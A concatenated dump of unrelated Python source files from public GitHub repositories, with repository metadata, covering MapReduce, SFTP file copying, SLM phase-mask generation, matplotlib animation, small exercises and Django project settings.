c7d594d40357f0020fc584144b499f0395fe4d45 | 4f4dd11bf460ac511cc6d023adaee585862c6938 | /pawenshu1.py | c1388df5c3a096b61a13fbfbce7016a5e68ef522 | [] | no_license | yijiangqingfeng/pawenshu | b14524fd43436064160cc4942dca97c08c335928 | 2faf5b4f6099f0d523a9dd08b7b0d18940e4f0db | refs/heads/master | 2023-03-06T02:27:18.351054 | 2021-02-21T12:58:01 | 2021-02-21T12:58:01 | 340,678,948 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 107 | py | from selenium import webdriver
import time
bro=webdriver.Chrome(execut ble_path='爬虫\chromedriver.exe') | [
"[email protected]"
] | |
76a49c26502a7d0a1ef66b31c48e747ee7d4847c | e70c75a33244e82de3ad1bd5b340bb0aa6b22ae9 | /task8/model2/reducer2.py | da078274e03dc3bf8185c029a5639cb31e2a534d | [] | no_license | joansanchez/MapReduce | e4ecb532f567a4e03241ff673e57332f96429445 | 91cda920cc4a5b5bd27b0a1f8c78b8d122bea4f5 | refs/heads/master | 2020-03-31T02:48:46.700098 | 2018-10-23T18:57:09 | 2018-10-23T18:57:09 | 151,840,674 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 811 | py | #!/usr/bin/env python2
#reducer2.py
import sys
prev_decade = None
values = []
first = 1
def getFinalAverage():
str1 = ''.join(values)
newValues = str1.strip().split(",")
averageDcd = sum(map(float,newValues))
return averageDcd/len(newValues)
for line in sys.stdin:
line = line.strip().split("\t")
decade = line[0]
if decade != prev_decade and prev_decade is not None:
average = getFinalAverage()
g = round(average,1)
print (prev_decade + "\t" + str(g) + "\t")
values = []
first = 1
prev_decade = decade
if first == 0:
values.append(",")
else:
first = 0
values.append(line[1])
if prev_decade is not None:
average = getFinalAverage()
g = round(average,1)
print (prev_decade + "\t" + str(g) + "\t")
| [
"[email protected]"
] | |
4378080d73d79db22e26768ee1aa3ea5ad18f02d | 696799b824503429a3ac65ebdc28890bfbcaebe0 | /spell/spell/lib/hifly/interface/_GlobalIDL__POA/__init__.py | 07fbcb34cfc2b1832d30ca8d1b51ba72cb065042 | [] | no_license | CalypsoCubesat/SPELL_GUI_4.0.2_win32_x86 | a176886b48873b090ab270c189113a8b2c261a06 | 9275ecfff2195ca4d4c297f894d80c1bcfa609e3 | refs/heads/master | 2021-08-03T08:04:25.821703 | 2019-10-28T04:53:50 | 2019-10-28T04:53:50 | 217,968,357 | 0 | 0 | null | 2021-08-02T17:03:44 | 2019-10-28T04:50:59 | Python | UTF-8 | Python | false | false | 880 | py | # DO NOT EDIT THIS FILE!
#
# Python module _GlobalIDL__POA generated by omniidl
import omniORB
omniORB.updateModule("spell.lib.hifly.interface._GlobalIDL__POA")
# ** 1. Stub files contributing to this module
import spell.lib.hifly.interface.TKCOMcorbaApplication_idl
import spell.lib.hifly.interface.TKCOMcorbaGUI_idl
import spell.lib.hifly.interface.TKCOMcorbaGUIlogInterest_idl
import spell.lib.hifly.interface.TKCOMcorbaGUIinstallation_idl
import spell.lib.hifly.interface.TKCOMcorbaProcessList_idl
import spell.lib.hifly.interface.TKCOMcorbaGUIinterest_idl
import spell.lib.hifly.interface.USERcorbaTypes_idl
import spell.lib.hifly.interface.USERcorbaManagerSync_idl
import spell.lib.hifly.interface.USERcorbaManager_idl
import spell.lib.hifly.interface.USERcorbaNotificationSource_idl
import spell.lib.hifly.interface.USERcorbaSession_idl
# ** 2. Sub-modules
# ** 3. End
| [
"[email protected]"
] | |
58aab337a2f07297187114095b4075ce7b4f5e1c | 768316ed72470715e641fda62a9166b610b27350 | /01-CodeChef-Begginer/263--Chef and Card Game.py | b1a78730b20668b518c61c5bc65f15d217f7b196 | [] | no_license | dhnesh12/codechef-solutions | 41113bb5922156888d9e57fdc35df89246e194f7 | 55bc7a69f76306bc0c3694180195c149cf951fb6 | refs/heads/master | 2023-03-31T15:42:04.649785 | 2021-04-06T05:38:38 | 2021-04-06T05:38:38 | 355,063,355 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 786 | py | # cook your dish here
def find_sum(elements):
total = 0
while(elements > 0):
total += int(elements % 10)
elements = int(elements / 10)
return total
test_case = int(input())
for i in range(test_case):
size_of_list = int(input())
count_1 = 0
count_2 = 0
for j in range(size_of_list):
chef, morthy = map(int, input().split())
chef_total = find_sum(chef)
morthy_total = find_sum(morthy)
if chef_total > morthy_total:
count_1 += 1
elif chef_total == morthy_total:
count_1 += 1
count_2 += 1
else:
count_2 += 1
if count_1 > count_2:
print(0, count_1)
elif count_1 < count_2:
print(1, count_2)
else:
print(2, count_1) | [
"[email protected]"
] | |
833cdd4d3f3e09d7a3565d327be5460e9ca3fc9d | d6d206c7f74e59cacf795c2b06c97d952b897164 | /NewAudioServer/how_to_send.py | f4d5eb01f01424f937d6ff558232f0bb00df2c3d | [] | no_license | jacobyn/NewAudioServer | 514f2315ad67e449946043b89ac47863a3cf7539 | 6c637ab0ee634c7df7ce303859d6821e582db16b | refs/heads/master | 2020-05-22T04:05:33.722694 | 2016-09-19T00:55:33 | 2016-09-19T00:55:33 | 55,329,592 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 164 | py | import requests
url = 'http://audio.norijacoby.com/analyze'
files = {'file': open('uploads/uploaded2.wav', 'rb')}
r = requests.post(url, files=files)
print r.text
| [
"[email protected]"
] | |
044d8947166c003ced67ee4881e274bcb4a3d450 | 6ae343f0d46bc9a8a96fa517b9acfaafdded7636 | /TbTe/timebasedtaskexecution.py | 95191c66156b64849059ef4dbfc6a53480eadb52 | [] | no_license | adij30/TimeBasedTaskExe | ed6ffd40095e476f52f5c44cc39b293e71811b6a | 46f3e63a6316364b5ad7b334a59fbcdb7006833a | refs/heads/master | 2022-11-05T05:33:53.140360 | 2020-06-28T13:59:06 | 2020-06-28T13:59:06 | 275,616,194 | 0 | 0 | null | 2020-06-28T15:42:38 | 2020-06-28T15:42:37 | null | UTF-8 | Python | false | false | 3,445 | py | from datetime import datetime
class TimeBaseTaskExe:
def __init__(self, tasktype, name, starttm, endtm):
self.tasktype = tasktype
self.name = name
self.starttm = starttm
self.endtm = endtm
def timebased(self):
print('Your Entered Input: ')
print(TaskType, User, StartTime, EndTime)
print('Output:')
current_time = datetime.now().time()
if self.starttm < current_time < self.endtm:
return True
elif self.starttm < self.endtm < current_time:
return False
elif current_time < self.starttm < self.endtm:
return self.starttm
def enhancedtimebased(self):
current_time = datetime.now().time()
current_day = datetime.now().weekday()
current_day_name = datetime.today().strftime("%A")
day_name = ['Monday', 'Tuesday', 'Wednesday', 'Thursday', 'Friday', 'Saturday', 'Sunday']
print('Your Entered Input: ')
print(TaskType, User, StartTime, EndTime, day1, day2)
print('Output:')
if current_day_name == day1 or current_day_name == day2:
if self.starttm < current_time < self.endtm:
return True
elif self.starttm < self.endtm < current_time:
if current_day_name == day1:
return '{} {}'.format(day2, self.starttm)
if current_day_name == day2:
return '{} {}'.format(day1, self.starttm)
elif current_time < self.starttm < self.endtm:
if current_day_name == day1:
return '{} {}'.format(day1, self.starttm)
if current_day_name == day2:
return '{} {}'.format(day2, self.starttm)
else:
d1 = day_name.index(day1)
d2 = day_name.index(day2)
l1 = [d1, d2]
l1.sort()
if l1[-1] < current_day:
return '{} {}'.format(day_name[l1[0]], self.starttm)
else:
for i in l1:
if i > current_day:
return '{} {}'.format(day_name[i], self.starttm)
def __str__(self):
return f'\n {self.__dict__}'
def __repr__(self):
return str(self)
while True:
TaskType = input('Enter your Task Type(Email,Call,SMS):', )
User = input('UserName:', )
while True:
StartTime = input('Enter a Start time in 24Hours format as HH:MM:SS :', )
Start_Time = (datetime.strptime(StartTime, '%H:%M:%S').time())
EndTime = input('Enter a End time in 24Hours format as HH:MM:SS : ')
End_Time = (datetime.strptime(EndTime, '%H:%M:%S').time())
if Start_Time > End_Time:
print('StartTime must be lesser than EndTime,Enter Again')
else:
break
timebase = TimeBaseTaskExe(TaskType, User, Start_Time, End_Time)
print('T/t-TimeBased\nE/e-EnhancedTimeBased')
option = input("Choose your option please T/t OR E/e:")
if option == 'T' or option == 't':
print(timebase.timebased())
break
elif option == 'E' or option == 'e':
print('Monday', 'Tuesday', 'Wednesday', 'Thursday', 'Friday', 'Saturday', 'Sunday')
day1 = input('Enter 1st day for Session(must entered as shown):',)
day2 = input('Enter 2nd day for Session(must entered as shown):',)
print(timebase.enhancedtimebased())
break
| [
"[email protected]"
] | |
49673bf0ccf5e67529f0847dc6e3444dfe3396cb | 9e3af8a40b53244722df812ef82edb09c659665f | /animate.py | 7476fab1b1d07cf4f39c5904951f9c2e8b58deab | [] | no_license | joemoore94/PlanetSimulation | 3888e20b8ae444cce39a3feb13623ebce67e5e22 | 1c02d987bdd3388dbc17db5a3529b2e39a084e2b | refs/heads/master | 2022-10-02T10:53:44.981180 | 2020-06-06T04:44:36 | 2020-06-06T04:44:36 | 269,868,025 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 817 | py | import numpy as np
import matplotlib.pyplot as plt
from matplotlib.animation import FuncAnimation
import sys
max = int(sys.argv[1])
s,x,y = np.loadtxt(f'particles/0.dat', usecols=(0,1,2), unpack=True)
for i in range(1,max):
s1,x1,y1 = np.loadtxt(f'particles/{i}.dat', usecols=(0,1,2), unpack=True)
s = np.column_stack((s,s1))
x = np.column_stack((x,x1))
y = np.column_stack((y,y1))
lim = 100
fig, ax = plt.subplots(figsize=(8,8))
ax.set(xlim=(-lim, lim), ylim=(-lim, lim))
scat = ax.scatter(x[0], y[0], color='black')
circ = plt.Circle((0,0),radius=5,fc='yellow')
plt.gca().add_patch(circ)
def animate(i):
x_i = x[i]
y_i = y[i]
scat.set_offsets(np.c_[x_i, y_i])
scat.set_sizes(s[i])
#print(x_i,y_i)
anim = FuncAnimation(fig, animate, interval=1, frames=len(y)-1)
plt.show()
| [
"[email protected]"
] | |
acf6c3c89fcd4c3c2e8ce49f3b795c8c5d49f20b | 4c678220177be1af3a89eefe5fef77b07de7f827 | /lesson_13/examples/position_in_file.py | 63ffc22896b0852c0f0ee3b80945df293bf8e3c3 | [] | no_license | Vladyslav92/PythonIntro02 | cc0aa4eb9f6376cd59be97e3d95a462ff8d90e83 | 43415a4b6c15bdfde040b5a8b498d822c9c3fcd2 | refs/heads/master | 2020-07-22T09:52:01.199759 | 2019-09-08T18:38:09 | 2019-09-08T18:38:09 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 751 | py | """
help(src.seek)
help(src.tell)
help(src.flush)
"""
import os
print(os.SEEK_SET)
print(os.SEEK_CUR)
print(os.SEEK_END)
filename = '/tmp/data.txt'
with open(filename, 'w') as fh:
fh.write("Hello World!\nHow are you today?\nThank you!")
print(os.path.getsize(filename)) # 42
with open(filename) as fh:
print(fh.tell()) # 0
row = fh.readline()
print(row) # Hello World!
print(fh.tell()) # 13
fh.seek(-7, os.SEEK_CUR)
print(fh.tell()) # 6
row = fh.readline()
print(row) # World!
print(fh.tell()) # 13
fh.seek(0, os.SEEK_SET)
print(fh.tell()) # 0
print(fh.read(5)) # Hello
fh.seek(-4, os.SEEK_END)
print(fh.tell()) # 38
print(fh.read()) # you!
print(fh.tell()) # 42 | [
"[email protected]"
] | |
14bfc4cff431f2c3f869eb5c1099612f78111145 | de24f83a5e3768a2638ebcf13cbe717e75740168 | /moodledata/vpl_data/324/usersdata/284/89554/submittedfiles/divisores.py | 13c2b3b92f659170432266e6544e618b11ce359a | [] | no_license | rafaelperazzo/programacao-web | 95643423a35c44613b0f64bed05bd34780fe2436 | 170dd5440afb9ee68a973f3de13a99aa4c735d79 | refs/heads/master | 2021-01-12T14:06:25.773146 | 2017-12-22T16:05:45 | 2017-12-22T16:05:45 | 69,566,344 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 278 | py | # -*- coding: utf-8 -*-
import math
n=int(input('digite a quantidade de multiplos: '))
a=int(input('digite o valor: '))
b=int(input('digite o valor: '))
for n in range(1,n/2+1,1):
if((a*n)!=(b*n)):
x=(a*n)
y=(b*n)
print(x)
print(y)
| [
"[email protected]"
] | |
01edac53fd98800b3cf4fe2b411f538c61d7a31d | ac2ddcba77341c78963e3d885fc9792fa09aa082 | /src/xp/ngramXP.py | 8dd1de27611573e549e4991018e5beec136415e3 | [] | no_license | l3robot/PP-Predict | d6dc987a706ea8c9c2f2c832b3ae84c7afb2f57a | b75952eea8c11a124f8ad788c3e274201e7774d6 | refs/heads/master | 2021-01-18T21:34:24.334556 | 2017-03-09T19:35:06 | 2017-03-09T19:35:06 | 84,369,485 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 883 | py | import json
import numpy as np
from sklearn.svm import LinearSVC
from bow.bagOfWords import BagOfWords
from bow.bowAndLearner import BowAndLearner
from bow.bowPreFilter import BowPreFilter
from xp.gridSearch import gridSearch2D
from visual.graphs import save2DGridSearch
def condition(h1, h2):
return h1 <= h2
def ngramXP(X, y, ngram):
print(' +ngram : begin with ngram {}'.format(ngram))
bow = BagOfWords(ngram).fit(X)
learner = LinearSVC()
mixed_learner = BowAndLearner(bow, learner)
lowBounds = np.arange(0, 30, 1)
highBounds = np.arange(20, 70, 1)
ans = gridSearch2D(X, y, mixed_learner, lowBounds, highBounds, condition, method='five2')
save2DGridSearch(ans[1], ans[2], ans[3], 'borne basse', 'borne haute', ngram)
with open('results-{}.json'.format(ngram), 'wb') as f:
json.dump('{}'.format(ans), f)
return ans
| [
"[email protected]"
] | |
ca70145663e5bd29f1a2419e6da9a5f5ac77a9dc | bc9a725ea14024b38d48e282b275f386251ca28c | /python/web/mysite/blog/migrations/0002_article_pub_time.py | e24a2983623db6b81e18d7f36350f7beb34076fb | [] | no_license | hushiking/work | ff431d15c2bd47268f05a6080bc00d0e83d7b023 | 9b17bf4cb5addfd5d089741d205fb5413ffa41d3 | refs/heads/master | 2020-12-02T21:12:07.170000 | 2018-07-30T04:43:53 | 2018-07-30T04:43:53 | 96,269,457 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 442 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.11.3 on 2017-07-04 08:18
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('blog', '0001_initial'),
]
operations = [
migrations.AddField(
model_name='article',
name='pub_time',
field=models.DateTimeField(auto_now=True),
),
]
| [
"[email protected]"
] | |
3fcc137cb41c867124bea9f3c0ceaf7aeceeb17e | 23dcfa80f3fa582d21991312c7ccf52828d752cd | /measure_response_matrix/pySLM/definitions.py | bd62976583d483af266b4aed128df02a6b3f1353 | [
"MIT"
] | permissive | XinLuETH/characterization-of-response-matrix | 56a0e376c5cbc25e2a9d848401c50c3659b28cf0 | 70b9d22d050d855214d080ba8f5155f977f5d1cd | refs/heads/master | 2021-08-11T08:38:42.480558 | 2017-11-13T12:25:27 | 2017-11-13T12:25:27 | 110,544,740 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 13,808 | py | __author__ = 'Chronis'
import numpy as np
from scipy.special import j1
from astropy.io import fits
import pygame, os, time, pickle
import win32api
from tkinter import *
from tkinter import ttk
from tkinter import filedialog
import matplotlib
matplotlib.use('TkAgg')
import matplotlib.pyplot as plt
import matplotlib.image as mplimg
from matplotlib.colors import Normalize
from matplotlib import cm
from matplotlib.backends.backend_tkagg import FigureCanvasTkAgg
class SLM:
"""
A class that enables to write an image to the Holoeye SLM seen as a second screen
with dimensions 1024x768 for SLM LC-2012 and 1920x1080 for SLM Pluto
"""
def __init__(self):
# get path that file is saved in
self.path = os.path.dirname(os.path.realpath("__file__"))
# find connected screens
screens = win32api.EnumDisplayMonitors()
if len(screens) < 2:
raise UserWarning('No second screen connected')
self.hdc = screens[1][0] # handle of second screen PYHANDLE
self.dim = screens[1][2] # screen dimensions
self.left = self.dim[0]
self.top = self.dim[1]
self.right = self.dim[2]
self.bottom = self.dim[3]
self.width = abs(self.right-self.left)
self.height = abs(self.bottom-self.top)
if self.width == 1024:
self.SLM_type = "LC-2012"
else:
self.SLM_type = "Pluto"
self.size = (self.width, self.height)
self.dimensions = (self.width, self.height, 3)
# set Windows ENVIRONMENTAL VARIABLE of SDL window position to the top-left corner
# of the second screen
os.environ['SDL_VIDEO_WINDOW_POS'] = "%d,%d" % (self.left, self.top)
pygame.display.init()
self.screen = pygame.display.set_mode(self.size)
# create surface object
self.surface = pygame.surfarray.make_surface(np.zeros(self.dimensions, dtype=np.uint8))
self.screen.blit(self.surface, (0, 0))
pygame.display.flip()
self.pxarray = []
self.maps = self.load_maps() # dictionary to store phase maps imported from file
self.active = False
# SLM pixel size
if self.SLM_type == "LC-2012":
self.pixelSize = 36
elif self.SLM_type == "Pluto":
self.pixelSize = 8
def create_reference_array(self):
"""
Reference surface pixels with numpy array. Every change made in the array will
automatically change the pixels in the surface. Ideal for fast operations.
:return:
"""
self.active = True
self.pxarray = pygame.surfarray.pixels3d(self.surface)
pygame.display.flip()
return
def delete_reference_array(self):
"""
Delete previously referenced array
:return:
"""
del self.pxarray
return
def load_maps(self):
"""
Import previously used phase maps that are stored in phase_maps.p
:return:
"""
fname = self.path + '\\phase_maps.p'
if os.path.isfile(fname):
return pickle.load(open(fname, 'rb'))
else:
return {}
def save_maps(self):
"""
Save imported map to phase_maps dictionary pickle file
:return:
"""
fname = self.path + '\\phase_maps.p'
pickle.dump(self.maps, open(fname, 'wb'))
return
def update(self):
"""
Get buffer of second screen
:return:
"""
pygame.display.update()
return
def quit(self):
"""
Quits display
:return:
"""
pygame.display.quit()
return
def draw(self, p):
"""
Draw array onto second screen.
:param p: p is an uint8 numpy array with the correct dimensions
:return:
"""
self.active = True
surface = pygame.surfarray.make_surface(p)
self.screen.blit(surface, (0, 0))
pygame.display.flip()
return
def four_quadrants(self, value, center):
"""
Make a matrix representing the four quadrants phase map
with four 0,value alternating regions
:param value: Usually value[0]=255, value[1]=pi but can change
:param center: Center (x0,y0) of four quadrants
:return:None
"""
if not((0 < value[0] < 256) and (0 < value[1] < 256)):
raise ValueError('value must be unsigned 8bit not %i' % value)
_x = int(center[0])
_y = int(center[1])
four_q = np.zeros((self.width, self.height), dtype=np.uint8)*value[0]
four_q[_x:-1, 0:_y] = value[1]
four_q[0:_x, _y:-1] = value[1]
return four_q
def import_phase_map(self, file):
"""
Imports an phase map stored in a file and saves it in an
numpy array for use on the SLM
:param file: A .txt or .fits file of a phase map
:return: write an 8bit array of the correct dimensions in maps dict
"""
filename, extension = os.path.splitext(file)
flag = False
if extension == '.txt':
p = np.loadtxt(file, dtype=int, delimiter=' ')
if np.shape(p) != self.size:
return
if np.shape(p) == (self.height, self.width):
p = p.T
m = np.zeros((self.width, self.height, 3), dtype=np.uint8)
m[:, :, 0] = p
m[:, :, 1] = p
m[:, :, 2] = p
self.maps[os.path.basename(filename)] = {'data': m}
elif extension == '.fits':
hdu = fits.open(file)
p = fits.getdata(file)
if np.shape(p) == self.size and np.max(p)<3:
self.maps[os.path.basename(filename)] = {'map': p}
flag = True
elif np.shape(p) == self.size and np.max(p)>3:
m = np.zeros((self.width, self.height, 3), dtype=np.uint8)
m[:, :, 0] = p
m[:, :, 1] = p
m[:, :, 2] = p
self.maps[os.path.basename(filename)] = {'data': m}
else:
print("Wrong dimensions ")
elif extension == '.bmp':
p = pygame.image.load(file)
p = pygame.surfarray.array3d(p)
self.maps[os.path.basename(filename)] = {'data': p}
else:
raise UserWarning('File extension %s not supported.' % extension)
# if np.shape(self.maps[filename]) != (1024, 768, 3):
# raise UserWarning('Wrong dimensions for SLM of size %i x %i (x %i)' % (self.width, self.height, 3))
# self.save_maps()
return filename, flag
def airy(self, r, F, l, I0):
"""
Airy pattern
:param r: radial distance from star
:param F: F number
:param l: wavelength
:param I0: Max intensity
:return:
"""
if r == 0:
return I0
x = np.pi*r*self.pixelSize/(l*1e-3*F)
I = I0*(2*j1(x)/x)**2
return I
def lorentzian(self, r, a, b):
"""
Creates the value of the lorentzian at distance r with center at a and scale b
and re-normalizes to 1
:param r: distance from star center
:param a: position of star center
:param b: scale/intensity
:return: value
"""
l = 1/(np.pi*b*(((r-a)**2/b**2)+1))
norm = 1/(np.pi*b)
l /= norm
return l
def four_qs(self, xp, yp, c, val1, val2):
"""
Calculates abstract four quadrants value for pixel x,y
:param xp: x in pixel coordinates
:param yp: y in pixel coordinates
:param c: (x,y) of star center
:param val1: value 1 of 4 quadrants phase mask
:param val2: value 2 of 4 quadrants phase mask
:return:
"""
xs, ys = c
x = xs-xp
y = ys-yp
if (x == 0 and y >= 0) or (y==0 and x > 0):
return val2
elif x == 0 and y<0 or (y==0 and x <= 0):
return val1
else:
pass
phi = np.arctan(y/x)
expr = (0 <= phi <= 0.5*np.pi) or (np.pi < phi < 1.5*np.pi)
if expr: # pixel is in first or third quadrant
return val2
else: # pixel is in second or fourth quadrant
return val1
def eight_octants(self, xp, yp, c, val1, val2):
"""
Method that creates 8octants phase mask
:param xp: pixel x coordinate
:param yp: pixel y coordinate
:param c: center coordinates in tuple (xc, yc)
:param val1: gray value 1
:param val2: gray value 2
:return:
"""
xs, ys = c
x = xp-xs
y = yp-ys
expr2 = lambda phi:(0.25*np.pi < phi)
expr1 = lambda phi:(0.25*np.pi <= phi)
expr3 = lambda phi:(-0.5*np.pi < phi < -0.25*np.pi)
expr4 = lambda phi:(-0.25*np.pi >= phi > -0.5*np.pi)
phi = 0
if x == 0 and y < 0:
return val2
elif x == 0 and y >= 0:
return val1
elif y==0 and x<0:
return val2
else:
phi = np.arctan(y/x)
if y > 0 and x > 0:
if expr2(phi): # pixel is in first or third quadrant
return val1
else: # pixel is in second or fourth quadrant
return val2
elif y < 0 and x < 0:
if expr1(phi): # pixel is in first or third quadrant
return val1
else: # pixel is in second or fourth quadrant
return val2
elif y < 0 and x > 0:
if expr3(phi): # pixel is in first or third quadrant
return val2
else: # pixel is in second or fourth quadrant
return val1
else:
if expr4(phi): # pixel is in first or third quadrant
return val2
else: # pixel is in second or fourth quadrant
return val1
def Vortex_coronagraph(self, xc, yc):
phase = np.empty(self.size, dtype=np.complex)
for (x, y), v in np.ndenumerate(phase):
z = complex(x-xc-0.5, y-yc-0.5)
phase[x, y] = z
return phase
def pixel_value(self, x, y, c1, c2, i1, i2, val1, val2, F1, F2, l1, l2, mask='FQPM'):
"""
Calculates value of pixel for 4 quadrants function
:param x: coordinates of pixel
:param y:
:param type: what type of map to apply
:return:
"""
x1, y1 = c1
x1 += 0.5
y1 += 0.5
a1 = np.sqrt(x1**2+y1**2)
x2, y2 = c2
x2 += 0.5
y2 += 0.5
a2 = np.sqrt(x2**2+y2**2)
r1 = np.sqrt((x1-x)**2 + (y1-y)**2) # doesn't have to be an integer
r2 = np.sqrt((x2-x)**2 + (y2-y)**2)
k1_airy = self.airy(r1, F1, l1, i1)
k2_airy = self.airy(r2, F2, l2, i2)
norm_airy = k1_airy + k2_airy
k1_airy /= norm_airy
k2_airy /= norm_airy
if mask == 'FQPM':
val_airy = k1_airy*self.four_qs(x, y, c1, val1, val2) + \
k2_airy*self.four_qs(x, y, c2, val1, val2)
return val_airy
elif mask == 'EOPM':
val_airy = k1_airy*self.eight_octants(x, y, c1, val1, val2) + \
k2_airy*self.eight_octants(x, y, c2, val2, val1)
return val_airy
def open_real_psf(self, psf_file):
# choose image of real psf
hdu = fits.open(psf_file)
self.psf = hdu[0].data
self.psf = self.psf.T
try:
c = hdu[0].header['center'] # center of weighting funnction
c = c.split(sep=',')
y, x = c
self.real_center = [int(x), int(y)]
except:
print("center not found in header")
return None
return
def real_psf_weight(self, x, y, xc, yc):
"""
Find out how much pixel is from center and get value of weight from real psf
:param x:
:param y:
:param c: center of star to get weight for
:return: weight
"""
x_i = x - xc + self.real_center[0]
y_i = y - yc + self.real_center[1]
return self.psf[x_i, y_i]
def pixel_value_real_psf(self, x, y, c1, c2, val1, val2, i1, i2, psf_file):
"""
Value of pixel in phase mask for binary case
:param x:
:param y:
:param c1: center of primary star
:param c2: center of second star
:param val1: phase value 1
:param val2: phase value 2
:param i1: intensity of primary star
:param i2: intensity of secondary star
:param psf_file: file containing the already normalized and smoothed real psf
:return: value of phase mask
"""
x1, y1 = c1
x2, y2 = c2
r1 = np.sqrt((x1-x)**2 + (y1-y)**2) # doesn't have to be an integer
r2 = np.sqrt((x2-x)**2 + (y2-y)**2)
k1_real = i1*self.real_psf_weight(x, y, x1, y1)
k2_real = i2*self.real_psf_weight(x, y, x2, y2)
norm_real = k1_real + k2_real
k1_real /= norm_real
k2_real /= norm_real
val_airy = k1_real*self.four_qs(x, y, c1, val1, val2) + k2_real*self.four_qs(x, y, c2, val1, val2)
return val_airy
| [
"[email protected]"
] | |
9a9dbd43fe8908039910579d0b92dd2c7dfb0bf7 | 5787c447443efebb0203b7a927ba519c3becc276 | /app.py | 5dc92fc99c63c00f46ce87b96dc43086a8f0a0ed | [] | no_license | Khanze99/app_with_connect_ftp | 793fed7b3fe9071a4807238a093c37c0ec141dfa | f08b31607eb7e5a99d332a9bd180e2743090dec9 | refs/heads/master | 2022-12-11T23:48:07.367465 | 2019-08-09T20:32:19 | 2019-08-09T20:32:19 | 201,040,161 | 0 | 0 | null | 2022-12-08T05:59:45 | 2019-08-07T11:51:14 | Python | UTF-8 | Python | false | false | 2,852 | py | from loguru import logger
import pysftp
import threading
import json
import time
CHECK = False
TURN_LIST = []
# logger.add('ftp_connect.log')
def parse_config(): # Парсим config
while True:
if len(TURN_LIST) == 0:
time.sleep(5)
for item in TURN_LIST:
try:
with open(command, mode='r') as config:
# logger.debug("Read config")
data = json.load(config)
except FileNotFoundError:
pass
# logger.debug("I can not find the config")
copy_local_to_server(**data)
TURN_LIST.remove(item)
def copy_local_to_server(**data): # Copy to the server
host = data['host']
from_path = data['from_path']
to_path = data['to_path']
try:
valid_open = open(from_path, mode="r")
valid_open.close()
except FileNotFoundError:
# logger.debug("Can not find the file")
return False
try:
with pysftp.Connection(host=host, username=data['username'], password=data['password']) as ftp:
# logger.debug('Connect to {}'.format(host))
ftp.put(from_path, to_path)
except FileNotFoundError:
# logger.debug("Can not find path to save on the server")
with pysftp.Connection(host=host, username=data['username'], password=data['password']) as ftp:
# logger.debug('Connect to {}'.format(host))
# Если не находит директорию на сервере, создаем свою папку и туда сохраняем наши файлы
file = from_path.split('/')[-1]
ftp_dir = "ftp_files"
pwd = ftp.pwd + '/'
to_save = pwd+ftp_dir+'/'+file
list_dirs = ftp.listdir()
if ftp_dir not in list_dirs:
ftp.mkdir(ftp_dir)
ftp.put(from_path, to_save)
# logger.debug('Copy to server dir - {}\n'.format(to_save))
if __name__ == "__main__":
thread = threading.Thread(target=parse_config, name='thread 2')
thread.start()
while True: # Thread 1
if CHECK is False:
print("-----------------------------HELLO-------------------------------\n"
".................Enter the path to the config....................\n"
"...........--------------------------------------------..........\n"
".......................input /exit to exit ......................\n"
"...........--------------------------------------------..........")
CHECK = True
command = input('Enter the path to the config or input /exit: ')
if command == '/exit':
# logger.debug("Good bye :)")
break
else:
TURN_LIST.append(command)
| [
"[email protected]"
] | |
869c8034b50fb5e93d07d9fc12588eb7e36cbafa | 480839c83f12bf5f77c596327806f47a3095bd4d | /blogproject/blogproject/settings.py | d27330d783f45bdbf385cb145c402117d600dbb9 | [] | no_license | aanchaldjangoproject/django-blog-project | b19708afabac978dd1a1fd3de1fdee0b306a3b48 | 2dbe4df3b62f44368b5b97773320c088b4975526 | refs/heads/master | 2022-12-15T10:31:40.964395 | 2020-09-08T09:23:51 | 2020-09-08T09:23:51 | 293,762,976 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,483 | py | """
Django settings for blogproject project.
Generated by 'django-admin startproject' using Django 3.1.
For more information on this file, see
https://docs.djangoproject.com/en/3.1/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/3.1/ref/settings/
"""
from pathlib import Path
# Build paths inside the project like this: BASE_DIR / 'subdir'.
BASE_DIR = Path(__file__).resolve(strict=True).parent.parent
TEMPLATE_DIR = BASE_DIR / 'templates'
STATIC_DIR = BASE_DIR / 'static'
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/3.1/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '8fm8hzvg#n=nopp3$5zl(^a!+_9q(ze61!oi7ua&s+39w#vzk7'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'blog',
'taggit'
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'blogproject.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [TEMPLATE_DIR],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'blogproject.wsgi.application'
# Database
# https://docs.djangoproject.com/en/3.1/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': BASE_DIR / 'db.sqlite3',
}
}
# Password validation
# https://docs.djangoproject.com/en/3.1/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
